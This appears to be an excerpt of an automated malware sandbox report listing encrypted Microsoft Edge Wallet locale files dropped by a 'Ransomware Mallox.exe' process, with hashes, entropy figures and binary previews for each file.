                    SHA-512:4E25A471A9330DBBF04DD28E66202FE383F6CABB6B84EEDE43690E078793F04DFDC9A156FD7CFA74362DAAC3344571DD2178478F9AB223F831D9C6E9BD9153E2
                    Malicious:false
                    Preview:.W.'V...`...I|?O..5.2>q1(...{a.W.../......C^.}Cy./.....O.'........0b.......d.n.k.S..zm..U2..=.Z6...xf..f.D.H..2?.<........8N..\...pM.........l..!1$..J==..i.U.7......TJYRCy.;}._+.}.4.L.s_..u.F-.9..`9C..V{)..w....:.....&4?.B..%.........N.Z...?..._e.s...f...3..X..........3OM.w...(.....Q...@.R..P$3H..HyJo.e.g.w........8f8.W1G..'y..K...H......ys.._T....G..m.s.......Y.B.&"q9.....A.T..Xa:k:@M..)\.V...)....d..o.;..S#...1...........l.o.F.a.0|NN.Q.i....v....B..p.~..s..LK.....q. ....'.!...*.....!....4KJ+.O..+B..=...).'....(t4.C"....D...a..B.v..SE.RL...gV......)>.L...u.a...<U,...c6m`.r...vG.'....H.L.df.f@.&.V....u.e......}K.%...4.......&D.-.<.CP......7G.h..............4..PjU.,...@..@'i.b...[.....a.AH..z.X.....o...r."L.....++..........4.).:.w`.o.l.L.d....F.D....g...N.ursaa..<.L.B.}Y..A..f...eO..-o.4.5.....1B,....=..j..-.6K6..^.%.]..f:3D.....w_...n.F.p.Ej.>.c.;.+r...B.0._L3G..r.......sT.W.w....U...u.Z.....={.$Z..ae;:r...k..sl.B.....>.?..j......2

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\es\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14697
                    Entropy (8bit):7.988040003728086
                    Encrypted:false
                    SSDEEP:384:JiuUf5yZAevOyGjhZnWb6RWopSbmId63opOL2oTFQ/rc1Mi:JHUfkZAevOljhZnWbaW4Sbpd63yoIli
                    MD5:85765C4625161A21C00CAB5457731C57
                    SHA1:D44A874CB2FA3BE08AE066F8568E61FFFC11FE07
                    SHA-256:C30E82C1B991BCB51655AFF2B0301C89A8A40984918207B3F430A2DB2554DECC
                    SHA-512:4908E19AA17A75412A02694CA9165C67752A6EA16BB4423614175AFE3D7CB1B3806774ADFF687B4D8797135862B8E8A6F0D32D035292B5B8FC6184C5EADA3205
                    Malicious:false
                    Preview:.H...[...~. .g...-,Fy.c.:.r:..%...%]&...=....J.4Z\.;..O..b6-.^XNL..L..`..b.rK.{..j'r....."e.a_...E-7Co&.Il..^...N......t.x..S.<.4..N.V\.L-.T1.it...J...*m...7.h<.Xgy...2t)#..;.....$w.c..n{.?_. )..%M. .....(.=.....0?..t......O27...^.d..I..My.............>.h.....}L..F.[d8..p..Av.H.c..N..3..l..!..I5..1......T..y..B.1)@.x.@.......LnI.x5.t.j..a.AZ$.tv=..m..U..Y.^.......}.W..Gx.0.l....=...H...v.-....q.S.(...]Zkw.:F...S[V....n..s.?..g=.z.........K.:...K....-#O..b..._...Q.9b!..G...+^.......rF.H0..R..[..d.1#.....P.3..../..B.vZ.Z6x.T.....V. .^..7*.O...p.2....Wj{.......Ff.&...,JU.I....-.).Wl&......O:..MO...>G.Y....h.6~1.X/.|..\..b.....%....O>.(v....~...By.C19H--kj%....d.v...uW..5H.,..*.C...?"\.#"...o..,Bf....I.K,.-............=n.).. <wS.B...P....:Bv(..K.3i[..`0.......ib..0...K./.d.;...}....Q....H..V..n{..Y....ob...`?....j&z.\.I..VW.h.gV.L......d.\r..C....'.;.DT..-....Q.0...*./.0..ElO?ws..Zu....Q.{.....(.(..]^....J...&.bY.N0.dK....G.j..N....+....7..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Secret Key
                    Category:dropped
                    Size (bytes):15677
                    Entropy (8bit):7.988115121568146
                    Encrypted:false
                    SSDEEP:384:k4eSjhl9As5PTNeHvC+t9y2M3+hSiJtf4A62KXr5kMVWjf2:kijhl9As5P5eP1thM3Jc8HFO2
                    MD5:EAF0A1C429A90DF5C14DA1B1381CED08
                    SHA1:6D1737DBCE584CEC4947A2903C3D25B5477D2525
                    SHA-256:0501885B56BD7159552AD401870AA9CB38291F38E55B0B823062965390BA3F6D
                    SHA-512:7C7B07D1A2AC578D4DA6A07A683688506CA1D96EEBAB43A15D8B578207DCC0A4C633DE47A0B0C350B5608AC4C7449924A6BC5723D5CFCB383E2F0651DDFFF2B6
                    Malicious:false
                    Preview:.P O......).U.*..G/.5^..k.US(F.F..T.@..3...l.#..'..dw6.m.}6J,.c....m.4(#..c...S.R.AP....i..J.z.tr_'..a.FR..[.....!C1j..nc s.E..I;.<4.Dst).V.K..h....*p.]].' Z.$.N..+U....T....$f.@..#.8\..k..?"q.......^x.M.A.r-.T...u.r.V.X.,2.z...^...3..,.P3..........*.S..s(..).+...L.I}[..]4..Z....6!...k...@.....e....?.....x;%y..<..F.........dw..<......%Y.O.Fy.#...A.I6..........vM02.PG..y..1.Z.E._...=.a.<...f.R.R.O.A...z.....%..u#.R..ov..n..{......!......K]?)..._..xD8....M....]u;R.P..N.,1.H.0.2yH.u.e..QT.5..e=y|..|F..|\Tt....Vm.a.x4..#.H.ON...gP.$./d]fg......`..xk%....Z.....e.6/.p..$..<.4[H.O..[..]..*.z....;....f|..q.|....}.#+.5.~.e5..~.v%.O....V?'.k.....b..}{.K.D.B......K..5.....R.RP'ms....w..p...C..U/a.0../h.F>.H]....1Qw.....N.l...h.Y/..99Ya....5.w.....k.=..a"y..8...a.nf.HsO..S..$..Ng....>N.Q..+..d..)O.9.r...8..?b..D....&$2...h..G.p.$.c..u. @...p...G...<bF.....v....d+1..r.......*~..Yu....W..%.....S>.1.......{<..s`r..&m............ ../-...c..D.D....p.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):15669
                    Entropy (8bit):7.98790794082622
                    Encrypted:false
                    SSDEEP:384:4DcJ5KVf4rUa6yIuJSb03AG3d07aIz8xtPz:hcVtriozG34i
                    MD5:68E56027CA1B19BDFEF26EDA9A080F88
                    SHA1:0B38E032FD75D07C26429E10E8E9051B4CC157B6
                    SHA-256:C1D3E8C1F01CFD848CEA9CE161C9C7CDA234D618E3A5EF7477538EFAFA335308
                    SHA-512:9AF2EB51840A041B0F8915E995193226ACEBF5BE52894C1738D915F2FBE31256C176E0D408C739CD80457BB870EC764F75BFE97EECF752D65275F56B25327FE6
                    Malicious:false
                    Preview:J....$PH.H8..!.9.......Z....)?.(N_.J....|{G.{U........}.M.c-.!e.v.9U.0..."c...j..J>..$D....[.....CY..5.....E...........G}^..mL..H..r[.'..E.i....M..Ag.E.N..R.A...."..S7...C.$.e.f..3pOc.b.~...y......D0l.?Wu...m...;.e]3|..r...9.............+]/.M5..|U.3..5Z......Z1.}./..mGxk.UcAh.....7.\.f.vZ...i6........Tkb/....f.....@.1.h%#....dz.M....7.....g.....r...[...........U..za......B..VN...(& .yY.djA.)0......z....<=..>.. .....%.g...H..h.d4]]..`.........A.XR. .qU.i.c.l(..S.p_rA}...`*.`k%.."......!.j...jO.\.fyc...A.V...(`....F...a.O....(LgZ....^.l..U..dS..[......c..L..u#.........r.7@j...&{.G..K5.|.6....\t...i[......L+[.R7PI..~TC.zO.=bR[!k.....$...;^.Q...k.......j.b.f..Z.o.........5.F.Ub5..w.. .....].)kr+f...V.z....<. J....w.h=..U.!.....V............L.{YC9....?..NVY......-.... ....<!..G.Z..w...w..\.Y..BK......F.h.V..t..c.h...*..mS.....e....3)....!.L.w`....N....#RM.mp...+..$........?..7....ft....!.L..j./.l...M.Z.d~..-....u....I....25.{.\..&.s.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\id\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14267
                    Entropy (8bit):7.9854253752476225
                    Encrypted:false
                    SSDEEP:384:LofyRWML0sBsKPVqTsVr3K4QQXWXBVbM8xDmhXxr0T0W:8fyRb0sBsvYVr64mXvTxyhBU0W
                    MD5:09F536311E2141B6B16DF74908D1C6BB
                    SHA1:73330481A42C2FF0AD0ED7BFF82006E8D5B6F3D4
                    SHA-256:9BDCB1DA27247E718A3FCA8916DE7BB42A4F7B6DF197C012D3123C847009C330
                    SHA-512:B0467B98A88F81AB2B2EB2564479B6C32F1DC12DF475A660D3105961E80434C27BE85AF7FAF9D5DA4A138FD960853A03A5119004205156A81007DA1714EA0EA3
                    Malicious:false
                    Preview:.R...Q..A9.|.....k)R\2#...e...u...i..o-.~..[.thM.bTH.g..%.'F.....~........&..V.F.<!../...=q.]...t.0.\.......A...cq.....y...X.v.D....7.n..#.odDQ.#dzL@W.3..1E$gXP.x....k.v..P'.W....Q...-...}7/.WI).....}...UO_..[~.").....h.s1:....R1..G..20..=>]..E....ma.g.[....^....R.......{._.Tz.^.).f.'....S.k._....i.}..*7..Hs.C#2.jd....|7{...p.....a..r9.&...3..BM....ii.8.X.6f.....{..I...n....j.6...../.P-.S...!OE.wvw......c..".:....7.U.':.....0........l..o9..&J[p<...-.}a.j......O(.%.o...D...k.!...D....;K.;`is..qd.AL...k2m.|....VP.&rC..........hA..f..ZqB..!.gI...F>..E..V...@\.._...Qy'%b...s....M..)..=....[GnA....M.j..E...PD.wD..1Q.1.=..o.0.......e.5..zM.q.v/..)..0....$n......z..X..1.n5.BkD.(>..=.......N...9T0.^.l...F...}.j..iJ.5{.....]F..\.!....*.~PK..L^(........Y....4.g.ql.#..9i.Z...ob...O.....M_.t..-.............L...Vt^.R.p.....c.p..."..oB5..].f..1#.gY..;d.S.O....L].y...;..|o....^........P2=V]...qA..l..O.].c'.L..7..H<$)...Y.6.G..7Cu....R'.[Y.....!....0p

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\it\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14701
                    Entropy (8bit):7.9856165423893914
                    Encrypted:false
                    SSDEEP:384:0jQdd11FwU5YE6GpbSN2fX8f2gjcg6TBV9HLty476:a411FwKJ6GXfsffjA5w476
                    MD5:37F3FAF8A8730D28BC22AF4DC6CAE644
                    SHA1:6FCA53296691FDEF98F0C953BB6F19F5C8E6FC83
                    SHA-256:868F2FAA958FAC436FA6134D53BD98E193B7301099ADAADBF9564EE7555F3426
                    SHA-512:1374D050D7F0FAFFD7C003801521BC7946F497152320F23FA04F7848D4572158277C2F7DB84E8B731CAD3E7B64CF67141748F902DBF93493A8F260358953588A
                    Malicious:false
                    Preview:..U.8...FO....S..}.'.P......g.$.^...hUh.H...~a...Wq.S.*T..Ee..^.o..\...k.x.....M..{[YhD'.&.w...o/.L.....k.W...O.7y.nD...u+3.?r7Y.v...MTV(....f.T.}j.]QI...:d..Y...nNj..-:7....Y].@5.G>?....D.R....... 1.9u..9.....wDY...2.[...."w)1.8....=.2.@P......Y....z].j...`.E.@.~.[..>...]w.....^^Pq..c's...c.yC.z..!..<c../..T...dpN...t@...U.ZYs.......+..R.b1=.dQ.....(..H.0O,....._".u....-.o.(...U1..5WbR-....A^..=R.dt......s^.?.....E../,.L9.t.?.5...."..@..d.p...r...i=.BK...'J.z..._.......u[H...Q.......U.}.LY..+.Bz..&...R.3..x!..Ab.......|..l{r.....`|...:..U.3.T........y..C.......u..%-.6+o...v../s.!..8.\W.... 0).-=.^....F2..\..M'f^|.y.~U..?S.Bb.....p.....R..(.....P6.Cq'.8...y.O^..k...Q...d........Q..Q.,.sy..L..Y...p.(....U..6....pz...%8.\`j.-.,...j|...%.3...).-..b...\...I.%6..R.....=.,B.Jl........B.l..U...;Q......@b...b..b'm...u...P.Ia.!...}|..<....N...........2.v... ..&-..u....:.....!52.s..~.c..{.M..f.....6........fr......v.a..F..\A..3 f............gp.R@..7t@...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):16985
                    Entropy (8bit):7.988631242005726
                    Encrypted:false
                    SSDEEP:384:xbFe+KbOkoVEFpaSRfag7T/kCHE1NV/osxWJH4giWEKDfRppYL5:WdomFQGfagT/diosYJH6UDZp0
                    MD5:BF8B9ACCE09B5BFC3DDE9E98E9A52D81
                    SHA1:C25D89F1580B384D63938BAD46CABC314FCD5A80
                    SHA-256:89C0E4CC266671ACF127DA0957A54A583E8602CA03109B3832161ADD44A40883
                    SHA-512:0EC6161C012C3E3579F31FA21D078C257FB097017F66C3E04AD6313DA940163A58BE724B3A93C0E218E6F02B7DAC0DD378B4642B1B850F4E267F0D608713A123
                    Malicious:false
                    Preview:...=.m..xp@T.?..pV.(....AkQ..y..nd.......0.E...../.9+x.\\S...!....+.Y.n..o.)^..Q.\.......o....p...l..(..(..Y...Z..?..."-c..z.W.L...j..2aADx.sQH......?...B..x8 .^|...XP2..:.U.B.".r..!L.....#.y.}..oJ.[:..0..Uv.%.DB......8.c...4.{]5=.....a}<.OR.y...I.8.e....'q...nM...:..(k.8t.r..?...5m..I...|...m.#[9\.m.... :..w...M&...e.=$K.pEY....Px3.o{..Vs....h,.2e...(.....#....G....t... ..Wq4.J.........\eR.o5..[..[....Y..R.Y.XC.uS*.%N'.'....S.....yg.....p...#..R....v)?.6.2|X......h~.U<_."...WwL\.....@-.".....9...0.....v.....d...2.I..@.R>)I..~.,..}q....p.].fe\...k%..1..^4".+..........:/..l._.I....{.1.D.......z/`..P.S.(.3().m..T:.....c).H.y.[.fv...u.;.......7o.....l.x.....{q..S.x....D....,...`./=........\..\.%.w..Zu%M.B....g..U....Y..n........@.}.s)..i_...ob....{E..S./-O...@E..WQ..}.]..v.!..$.;'....;.S)..[V.A.$1.......u*s...`.(..2.$...J...qVC-...y..k.../..."..n...}P.1.e....;8w......u....w.X..U|.....1.,F..xs..u...db.n.zf....lr8...J..'p..f*#..+..v.Gz....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\nl\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14560
                    Entropy (8bit):7.986995831209214
                    Encrypted:false
                    SSDEEP:384:4s/YFSAIj8aXGl//WAShJB2oI5QXG3w2DRemw4NS+s/BsW/n+0L6:rEI4aXGEASh2o2QXG3wgrlIbO
                    MD5:A318B2B9B77E3275C86DA393F682A459
                    SHA1:8D5081DEA0139352B851EE2C96384230288D4755
                    SHA-256:6834ABE3A1817AE005EB15947AEBCD99AB3E4BC39F187FE9AF1BF7700FEABA56
                    SHA-512:68CA1E925ADD49844CFF4A70D3C73584A48B66814DEA62130F5621D37703B796CE08BA91A5149A98E87A657763EE1825CC3B14FA0FC27E2850F903753A75D706
                    Malicious:false
                    Preview:...DX.n....VE.|.k...#Ag.........Qka.....N*<x..I.....l..M..;..U...4o.KSL...R..ZdX.O.....rT.f.m.1...|.e.e...C.0.,...8 o...msu]u{`.\l.@a.6..++..8.^:..j..n.<...4Y.(..[.vGg..~"&0..l.#...#.<..K...j...Ok@.h...uM....C.q....&K...pH.Z.$..'....:b..<.....Y..k...P....4.G...]...l.f90......_..e..: (U.x#*...5......Ak&D..Mo..!.........La&..9...@Z.6.......V..d..YH....4LQ.....Y...(.z[^.....Q..*_..T.~.Ho.k....y`.,.m.Bs.......@%...m.z=........M...%.$Xp..&2.]Tv.<.[./...9|&>`)...r.Sc..ELX....`.......Vd.././...kR.k.....1.e~(..=.....v...Y/..T...T....`.4j.y..S.%..C..~...W}6G.r..8....D..>...t.n....*.8..-.....!/%...0......?.E...>..R...}...q...).!od........Ld.$=>.8.........:8.}...W..Ey.;.....*.et..N..;........R.f...|...l.n.r?m.....N..!...[sf...n..R.....ha...u}y.+;..p........N..DK........VZ..i..r....d....Dnk..]|.Y.v.....6^.....8c*.j......q<....k...0.z.C..{.W..#`...85R..n.....U.H3n.Z[0...`....+..e7.0..A.(.iJ|[.<_:.............5...[.k.'?E>......W\..|W...Rl.@<

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14543
                    Entropy (8bit):7.986436403251446
                    Encrypted:false
                    SSDEEP:384:jKDifoS7Qukv1hULS0tsap6nfdpPApyu1AXfECz+xUW8Ud:uDZoInULS0tsNZu1AEG+x3
                    MD5:17B5E46950AB6DD26E64043C309D4246
                    SHA1:B505C4B1D0F805F6A9F47BE15A48890479F96483
                    SHA-256:ACD8BD6918AF9C5C75B4129C26811FA3AE7C8AD26ACEF6377518F585A3BFB06C
                    SHA-512:DDB4DCBFB35F1DB9C3E30F9E6463036969DDD24DDEEE4963125082F9B29A03AA323AA51B3F24B59B28194E7C1C74E68AF040BABF22DE101C264620829422F3DA
                    Malicious:false
                    Preview:k...s|.:.MB.d.4.7.b6...x_....b...'..m.qi[s...Hq.D7...[..-..c....9..e...{.um..7..bV@...F...v].s....D.....b..][._. H._x...2...b.oG.b"....%x........d.N..HHrx.je~'?R.(..lH..'.>....e.@H>.SQ.}....B....P.E'B...u......U....(.Li.|N..j.B..Y.E~..`.d.2..vqC^...<..!67I.... ......W..T....~..y,HG............=w..P&|.x`...l.P..{h5.......4.....=+|.B*.....`C...Zl."...]./...=%...~.<....../-=./o3Y.H.....pU....?.tW..a.O..8l....yc....v`.....W...as..8.mR.l .4..Ty...M..du$.]P...5...8....G..KS...].'....{...E..v.~2...sKM.!9.._#...[EU[.f.u/w..."..q#:..1~...b].s.OVC...[.p.*..6..._..>3..@;.(So.Z%T...C...e.;Sg2z?...L..t6....N.}..vdL.a.......N6.V7,.!.p...d..8A.'.<....K.x..4....^...7.............+...z..m.J.(.1.c....8Hf.99..).~Z.eC..w...g.....rO>..ku..-.#.C'...\.U.Mv.....zR...C..`r.[[5U.`...9O.P......U.5a...u2..5.......c..6.Nk#S.p..K.<2.Q....(:..zc...6'#...cw..y.g\.....i2,p......`.. O..0?....D..2...._Q..]pb9.....e....!..c..1c......V.....g?s..o.q8x.f........P3.(.w...yyw+.U

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14730
                    Entropy (8bit):7.987075449183833
                    Encrypted:false
                    SSDEEP:384:/2N7ZMU1V4zhgKfbyNfEg6UtrF35Z0moaCJJzdu0fvLN6LVqmt9akIMy2:aZT1V472NfEgTtJT0lXU0ILh99y2
                    MD5:8284CDF5BD962BB7079D7A8063348608
                    SHA1:AF304373555790D75FEF9CE88D483182582D51A8
                    SHA-256:7696462FD74691F84DDA06C75324FD1508D2C917F78950956A246AF279701169
                    SHA-512:1A7C671874EBD02B1AAC822A97A6AB6ABE63D27DB839AF0161ED41C039B6BFAB0288B33A42E369BDDC8C88D88775B2DFA037F448456CCE72486A2E5AC699074E
                    Malicious:false
                    Preview:h.....=R+L...P..dT}(..;.......(<.^a.\2z.J.m.....'g..H...Z......+f....G%.]^..A..ST.1f......d.Qi;U...0...\I..w.......3.+S.....j....p......I5'.!.e..b.".....\(.+.C.jxG...$H ..-....Z...X3/.h.B.ja....9.....Sn..oO3~....6..H............bz^g......n..o'{.n..9 F. F+..d.).i.-.a.-SM....4=..u...vn;..w....?...&]:.-..@... .:....#..=....u+l P4..M.v.)6M.X....6....x'...ul..9.v....O...:g.H..........h...>..F...D..A.....s.a9..eU...!.~E....4.....N8.u.g...:..u...r.b.\..+..#.7..~......k.||........Ww\#....U.5.L[?..y..........O.-.9_%.:.U..2...8..(..b.NK3.(}.A..)..K}....b...o.~..-.-*. .,t...M.'rE..!.5..A.G.>....E.....1R.....k.v...@6nQ.Ox...E*.c.......:..^R...R...jm){.}j.I....f,....}=.s.z.$.Pu....d.'*..h....^A...#..$.uR..=.e.|y.3..#.<ME...7V...,It.y.C...M...%P.I2..[T...C8.RPy0^...2.v.O/.v(.`....:..>...o.;....b.f3.F..|K.@.<......J....i....8c.dYF....F..M../>.....6...=.@.tru.Y|..&...zs;.._....S}..]?.g..(......B..tp.R.F3.....<...{.SV._..#......._-...I.`....%KO.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20589
                    Entropy (8bit):7.992121961873733
                    Encrypted:true
                    SSDEEP:384:pZO/ehLo0ZVIsZ2V5S7RMdL+3vdQ5/O9pSDqm54fcOZvUao8zM:pZO/eHMsZUYRMdK1z1m2fcOZ3Y
                    MD5:B2D9FFD5DBC4AC3111369598D87A76A8
                    SHA1:69ABCEE87667DA21D758E0A1B6B1130A26B23503
                    SHA-256:90F40E5311AFBF7192C5A94D4B2E30D068F227CEFDBE0890D70262D1319FEA56
                    SHA-512:401100A5992CA097836EB5287B3AD71CC53448E4B983A5EB54358C3B1D9B1169414B2859CB079F607DD97C279ABF9A7A18F5908D56617EC961E78FCBADA41AB0
                    Malicious:true
                    Preview:...'.....I..S...sR.,';..i.....|..~.w.g'...<N.HW4.y..^.,mC...G.q...n);..k.{...+'.<.}.\%...i.....k]....F..Ey..FW.'ik~-.WLfF....>.@...J..q.<..h..nY.N.....]qE.....0...r..K.h...Gq..|D..0.D.Q;.4.,E.V&...j..<.|.*.?.....l<..[....Fv...%.v.%\.#..y.5...yY.\g.,..8R=.X#.[...&..(x...(Y..O.>".1.....+...F$7.1|.jh..#!.7.G.....'.V.A.Bvc.J..1.U.........q...`....T.]?...dI.j..N........._.grh.`.o....:`...d.\...2(.R.z.....g...A=BPF;...i..D...Py?..J...n........C...^..V.H.'Gp......d.-%. d.Xi.......9Y$.R.r*.<.R3*s.0....rj..=k..G:..W.+.'..9......6.........5.H.=&...........*....H3.w..m..[...TLW......G...&."..Q!...Kj.;..m~.q.OF._m....8R.Kr.....l..l..`E.a.+.f..kf..........*."}".S.....*.W.s.....[....w.7...-....<..(l-..]7N..nZMb8.xHv..D....M~jA_].a..[...K......".Zu.&._.k..K..d....m...0&....\K...-vQen...-Y.s+.X..p...I....".a....._?..O._.2...@*[<.{jE..........:p........ft.d|.9....1.@.~.[$R..Xm.2.o2...Y.P..e.(orK..|`...-."..IX..]0..Y.....B.n..s.Q.kL.N..x0Va:].w.*#.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\sv\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14286
                    Entropy (8bit):7.9889656024497055
                    Encrypted:false
                    SSDEEP:384:jlQEH9TEO9DFurZOJor1fP1JbaBW9f5TWc:jJdTEk6ZOJodPbdp5x
                    MD5:081B2898396897DCD3598FFA9562E2A1
                    SHA1:6DFF5EDC2F3628F95B69981063E581AC9255FEAC
                    SHA-256:E54C899969DFF3AFA92694F91106FB2BFDFBFC6A1C406781092BC8779F34B733
                    SHA-512:729E113B67F1E6153936EC25BB8080DB49B0C3A66DB85FE0A6BD658501C8E8FBA60167891B90C6D39C6806E59C575BAADDDC07A3FADEB66B96AE755E490BB399
                    Malicious:false
                    Preview:..v..^.;.... ..$...j.~u.........d.v$...|......~,1...!.3_u....A.o..p..&+.u.qCB...e../.d*..N...J.j.8R.B.Ry8......%.FY..=.....1",.Yb..<.Eu...a=.30.^.%Ky4QD..W..%F.....q.....m.$.y>...N.....i..;"b..K....=C]...6..:Zk..D..E.W...T.......W%..!i.T...<....))y.f.N.....O.....:...i...9..S...c..(..)...z...I...z.q.!......d.......J...E{.Y..W}...o*L...u..rp...j.@B.c...7..{..!..8..G..w.Ug....Tx^M.....m.....K,...[!v.*..~2..P...H!...r...2.....p.j..'M...\......Kt`..rT.:...c-.9...{UpI>.".]....F=...Vu....C.gT.]..K....h.......KK.T..^...Br.~b'..N.r.8#..uh,?.BL..rD....`.R.......'...J9#3......."+...w.q.l.Y>NK..)?....^g.j.%.?.1..6.,.....8...~....6.0c.S.Qv....V)^x=S..r.j..1..ci:a...Q.2...1a.F.8.]..s.Wc.... ....Q.vf.8..Tw\.~[.t.|#1.yV..?.!....& ."l..I....^V ..b.~..l.NO.y.U.|<#.F3.f+.u..........m)Y$.z......M...nA.C...+...d.}.OD..U.]..u....\>.pe.xa.K.<.E....;}.d&..L.HA....h..9b.'..j..HC^.g".#.i&.:L..i..?k...S..`../.=...+..)..iw.,.TvE$....!.....T..<..[4.......fh..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12982
                    Entropy (8bit):7.987081752672112
                    Encrypted:false
                    SSDEEP:192:/cSexonJSDpTAIN56QNgAjAIN1BivThPVqiX41FTxRo7MBXGGqnpMp8I0ooY3Vbg:ESLJYT6eGINkXqiCtBXGG8pMiI0S0b
                    MD5:C748AFC167BA9BB0C83B08F52BEA1BAF
                    SHA1:28DEA46BADAB3C2E20AFBA69C3E0B784DA2A87BC
                    SHA-256:6F51A3C144AECEF624C0B62C8292B73403C841FBA7BD48E236067BC2B4966368
                    SHA-512:3D82427EE01A5A2905D3EE9917D02D659624A06EA4496B498C9B09033EF250052A8C5EADCE9433A7BB5277AF275723FB4ED6F3EA5EE570D63AB38EA6476CCEF0
                    Malicious:false
                    Preview:.!...@..C..L.....!.Z<.*#..|....P..[.......>Y.)...SN...D..j$...=R.J.p...38*.D.o...Qr..........)=....W..{..Q..K:Y..'j.B..l....x.S.q.M.TR..l.....T.....M.U?H..#={6.v......v.....e.W.H#p..H......OL-..~."f..\.&..T...J...%4\.|.:..E......Z..-........N. ..).wP......(.~.&..5.k.Vv./=4....[...al..x{.....d.HT6~..........&.(......c...3k....y.."..FX.+L.j8<.. h9..|.2....-b.d......;..? ...U.W.~...j.O+ ..;.*N.#e..].4..2c}~...c.gj.#...%.t.......,#...m....^...=....~..../prvx..UL..64........|eF...u...5t.Z..._..).'..TB..T..8...`Ov.9J...9w...!&i..ieP.y."j....uF`.>&.0/....{...~\..-.....~.^,!.p....q...#.Xub(z..T.;.(...\...a.hj..d..M|?.3.6.@..O.C.,=W.#..../!....i...Y=;.....&-.ML.........AN...o...............j...%.1.=u..U.T.!~k..&..{..A.IG.T.'\..E.GS+#....$u $....U.......$...w4.=6.....j....yE.P.d.fk0.P....V.......'.x........l....d=;7.">S.7sV....2..v....?2>..Z..:Y].D.L.:...d.{3.m.M...P.'....+..........".*..~.l.....{..4.9.9...X....X.v.D...P....8..:.&

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hant\strings.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):13437
                    Entropy (8bit):7.987046893770918
                    Encrypted:false
                    SSDEEP:384:fPP5ldA3+rHBWtgGbrWaVKBwj0+S3GRf4gy1z:ZA2HBWtgGbrxVKI03GFHy1z
                    MD5:1802FD1288607768A4E98B80C12F5417
                    SHA1:137B35959D32C8A72CB03977E490CB051D5B7D27
                    SHA-256:CED3D40C920ECCBE04CD969B1E685E08CFBBC2D78DBCAE5145F2584705541E15
                    SHA-512:BBB6E679A533D899866BFFD7F99D661B5AB576D2D8FF4C085D13E28599094B58D04ACFD58F96B7BA7E7E57F798F0E170F6997EFC2F3B1623AD9D7F5F525DB26E
                    Malicious:false
